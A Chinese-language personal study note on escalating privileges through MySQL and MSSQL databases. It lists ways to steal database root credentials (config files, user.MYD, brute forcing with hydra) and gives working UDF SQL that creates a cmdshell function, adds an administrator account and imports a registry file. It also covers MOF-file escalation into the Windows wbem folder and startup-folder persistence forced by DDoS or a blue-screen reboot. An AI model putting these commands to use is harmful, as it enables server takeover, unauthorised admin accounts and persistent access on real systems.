今天主要学习了,mysql和mssql的提权。
想要通过数据库提权最重要的条件就是要知道数据库root的账号和密码。
mysql提权:
获取mysql数据库账号密码的方法:
- 查看网站配置文件(conn config data sql common inc等)
2.查看数据库安装路径下的文件 安装目录/data/mysql/user.myd myi
3.通过暴力破解得到(对于高版本数据库用处不大)暴力破解需要用到的两个不错的工具是:hscan hydra hydra有linux的版本,在windows下效果不怎么样
mysql udf提权(通过自定义函数提权)
工具提权:用mysql提权工具进行提权,同样只适用于支持外链的数据库
脚本提权:(不支持外链的数据库)
去网上找mysql提权脚本,有的大马本身就有这功能,可以去网上找找
mysql <=5.0 导出到windows下
5.1之后在数据库的安装路径下创建libplugin文件夹再把udf.dll导出到这个文件夹中
select @@basedir 查看mysql的安装路径
提权命令:
create function cmdshell returns string soname ‘udf.dll‘ (导出语句)
select cmdshell(‘net user iis_user [email protected]#abcABC /add‘);
select cmdshell(‘net localgroup administrators iis_user /add‘);
select cmdshell(‘regedit /s d:web3389.reg‘);
drop function cmdshell;
mysql mof提权(去网上下载mof提权的核心代码)
1.找个可写目录,上传mof文件 (转自:
http://www.myhack58.com/Article/html/3/8/2013/38264.htm)
2.执行sql语句
select load_file(‘C:\\RECYCLER\\nullevt.mof‘) into
dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof‘;
执行完之后等待即可。
执行完后需要执行: (转自:
http://www.myhack58.com/Article/html/3/8/2013/38264.htm)
2.执行sql语句
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
mysql 启动项提权
在目标服务器的启动文件夹中创建bat或vbs文件随主机启动
再用ddos或蓝屏使服务器重启
网上有教程可以去看看。
mssql提权:sqltools工具(数据库连接工具就可以)